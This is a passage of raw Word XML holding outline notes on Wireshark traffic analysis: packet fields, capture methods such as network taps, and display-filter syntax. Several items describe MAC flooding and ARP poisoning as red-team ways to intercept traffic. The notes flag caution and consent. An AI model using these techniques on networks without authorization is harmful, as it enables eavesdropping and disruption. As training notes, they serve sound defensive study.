        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Source and Destination</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25BB8B0B" w14:textId="0D59AEE9" w:rsidR="000D1BAE" w:rsidRPr="0084205E" w:rsidRDefault="000D1BAE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3462CA40" w14:textId="0FDEDFE7" w:rsidR="000D1BAE" w:rsidRPr="0084205E" w:rsidRDefault="000D1BAE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Length</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7440627A" w14:textId="4AB25C2B" w:rsidR="000D1BAE" w:rsidRPr="0084205E" w:rsidRDefault="000D1BAE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Packet Info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3786AB79" w14:textId="4E670E22" w:rsidR="000D1BAE" w:rsidRPr="0084205E" w:rsidRDefault="000D1BAE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Packet color coding/danger level coding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62960065" w14:textId="5829EB45" w:rsidR="000D1BAE" w:rsidRPr="0084205E" w:rsidRDefault="000D1BAE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Ways to gather PCAP files – Collection Methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B33A02A" w14:textId="01700F0A" w:rsidR="000D1BAE" w:rsidRPr="0084205E" w:rsidRDefault="000D1BAE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Ensure computer power and system memory available for analyzing a given size network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FDA3A3" w14:textId="22E11457" w:rsidR="00190943" w:rsidRPr="0084205E" w:rsidRDefault="00190943" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD624E6" w14:textId="705FEAEA" w:rsidR="00190943" w:rsidRPr="0084205E" w:rsidRDefault="00190943" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Network Taps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC4141C" w14:textId="385E85C7" w:rsidR="00190943" w:rsidRPr="0084205E" w:rsidRDefault="00190943" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Physical implant – </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>used  by</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> Threat Hunting/DFIR teams/Red Teams</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3EFE8F" w14:textId="681F0C9B" w:rsidR="00190943" w:rsidRPr="0084205E" w:rsidRDefault="00190943" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Hardware taps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D03416E" w14:textId="4DBACC28" w:rsidR="00190943" w:rsidRPr="0084205E" w:rsidRDefault="00190943" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Vampire Taps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1236F9C5" w14:textId="1380342E" w:rsidR="00190943" w:rsidRPr="0084205E" w:rsidRDefault="00190943" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Directly on a wire</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731D862E" w14:textId="77FD0589" w:rsidR="00190943" w:rsidRPr="0084205E" w:rsidRDefault="00190943" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Inline network tap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CA3F0C" w14:textId="0A339145" w:rsidR="00190943" w:rsidRPr="0084205E" w:rsidRDefault="00190943" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Between network devices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7758BA50" w14:textId="79D5669D" w:rsidR="00190943" w:rsidRPr="0084205E" w:rsidRDefault="00190943" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Throwing Star LAN Tap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACE9517" w14:textId="1B7B9954" w:rsidR="00190943" w:rsidRPr="0084205E" w:rsidRDefault="00190943" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>MAC Floods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB5F099" w14:textId="50306DE3" w:rsidR="00190943" w:rsidRPr="0084205E" w:rsidRDefault="00190943" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Used by red teams to actively sniff packets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF470DC" w14:textId="27EB104A" w:rsidR="00190943" w:rsidRPr="0084205E" w:rsidRDefault="00190943" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Stress switch and fill CAM table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FDCB4F4" w14:textId="58E47234" w:rsidR="00190943" w:rsidRPr="0084205E" w:rsidRDefault="00190943" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Once CAM is filled, Switch will no longer accept new MAC addresses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFE0FDA" w14:textId="1345DC44" w:rsidR="00190943" w:rsidRPr="0084205E" w:rsidRDefault="00190943" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>To prevent backlog, switch will send out packets to all ports on the switch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1FD293" w14:textId="5FA974F8" w:rsidR="00190943" w:rsidRPr="0084205E" w:rsidRDefault="00190943" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Use technique with caution and explicit consent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F93EB7" w14:textId="1766053E" w:rsidR="00190943" w:rsidRPr="0084205E" w:rsidRDefault="00190943" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>ARP Poisoning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE3C6E8" w14:textId="4C3E2AC9" w:rsidR="00190943" w:rsidRPr="0084205E" w:rsidRDefault="00190943" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Used by red teams</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FC3F95" w14:textId="7B38B452" w:rsidR="00190943" w:rsidRPr="0084205E" w:rsidRDefault="00190943" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Redirect traffic from host(s) to machine being used for monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496AAB98" w14:textId="6A082536" w:rsidR="00190943" w:rsidRPr="0084205E" w:rsidRDefault="00190943" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>Will not stress network equipment (as MAC Floods do), but should still be used with caution if other methods are unavailable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558880CD" w14:textId="1505AA45" w:rsidR="00532C44" w:rsidRPr="0084205E" w:rsidRDefault="00532C44" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Filtering Captures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1561D23D" w14:textId="6B72F8C6" w:rsidR="00532C44" w:rsidRPr="0084205E" w:rsidRDefault="00532C44" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Display captures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BEACFB" w14:textId="232BF302" w:rsidR="00532C44" w:rsidRPr="0084205E" w:rsidRDefault="00532C44" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Added through Analyze tab and Filter bar on top of packet capture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68164F5E" w14:textId="6F7FC885" w:rsidR="00532C44" w:rsidRPr="0084205E" w:rsidRDefault="00532C44" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Filtering Operators</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143C9925" w14:textId="032258A4" w:rsidR="00532C44" w:rsidRPr="0084205E" w:rsidRDefault="00532C44" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>And – operator: and/&amp;&amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AF30AB" w14:textId="07025D23" w:rsidR="00532C44" w:rsidRPr="0084205E" w:rsidRDefault="00532C44" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Or – operator: or / ||</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BBCAEE" w14:textId="3244A607" w:rsidR="00532C44" w:rsidRPr="0084205E" w:rsidRDefault="00532C44" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Equals – operator: eq/==</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA23223" w14:textId="0FF27138" w:rsidR="00532C44" w:rsidRPr="0084205E" w:rsidRDefault="00532C44" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Not equal – operator: ne </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/ !</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EE1C20" w14:textId="1F587B7E" w:rsidR="00532C44" w:rsidRPr="0084205E" w:rsidRDefault="00532C44" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Greater than – operator: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>gt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> / &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208649DF" w14:textId="2AD1A61D" w:rsidR="00532C44" w:rsidRPr="0084205E" w:rsidRDefault="00532C44" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Less than – operator: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>lt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> / &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DE8073" w14:textId="0A44EB63" w:rsidR="00532C44" w:rsidRPr="0084205E" w:rsidRDefault="00532C44" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Additional contains, matches, and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>bitwise_and</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> operators for searching for single packets in mass collections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1106E8AB" w14:textId="1878D45A" w:rsidR="00532C44" w:rsidRPr="0084205E" w:rsidRDefault="00532C44" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Basic Filtering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7735F8" w14:textId="4B9A1F18" w:rsidR="00532C44" w:rsidRPr="0084205E" w:rsidRDefault="00532C44" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Gives large scope via syntax options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A7C7BE" w14:textId="4991FA9A" w:rsidR="009C1171" w:rsidRPr="0084205E" w:rsidRDefault="009C1171" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Syntax: &lt;protocol</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>&gt;.&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>filter type&gt; == &lt;IP address&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0047CD20" w14:textId="042D3C74" w:rsidR="009C1171" w:rsidRPr="0084205E" w:rsidRDefault="009C1171" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Ex. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ip.addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> == &lt;IP address&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13590536" w14:textId="1001E099" w:rsidR="009C1171" w:rsidRPr="0084205E" w:rsidRDefault="009C1171" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Ex. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ip.</w:t>
      </w:r>
      <w:r w:rsidR="009F3DDC" w:rsidRPr="0084205E">
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> == &lt;SRC IP address&gt;</w:t>
      </w:r>
      <w:r w:rsidR="009F3DDC" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009F3DDC" w:rsidRPr="0084205E">
        <w:t>ip.dst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009F3DDC" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> == &lt;DST IP Address&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33120A5A" w14:textId="42E901A6" w:rsidR="009F3DDC" w:rsidRPr="0084205E" w:rsidRDefault="009F3DDC" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Ex. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>tcp.port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> eq &lt;Port #&gt; or &lt;Protocol Name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF12766" w14:textId="65471EEF" w:rsidR="009F3DDC" w:rsidRPr="0084205E" w:rsidRDefault="009F3DDC" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
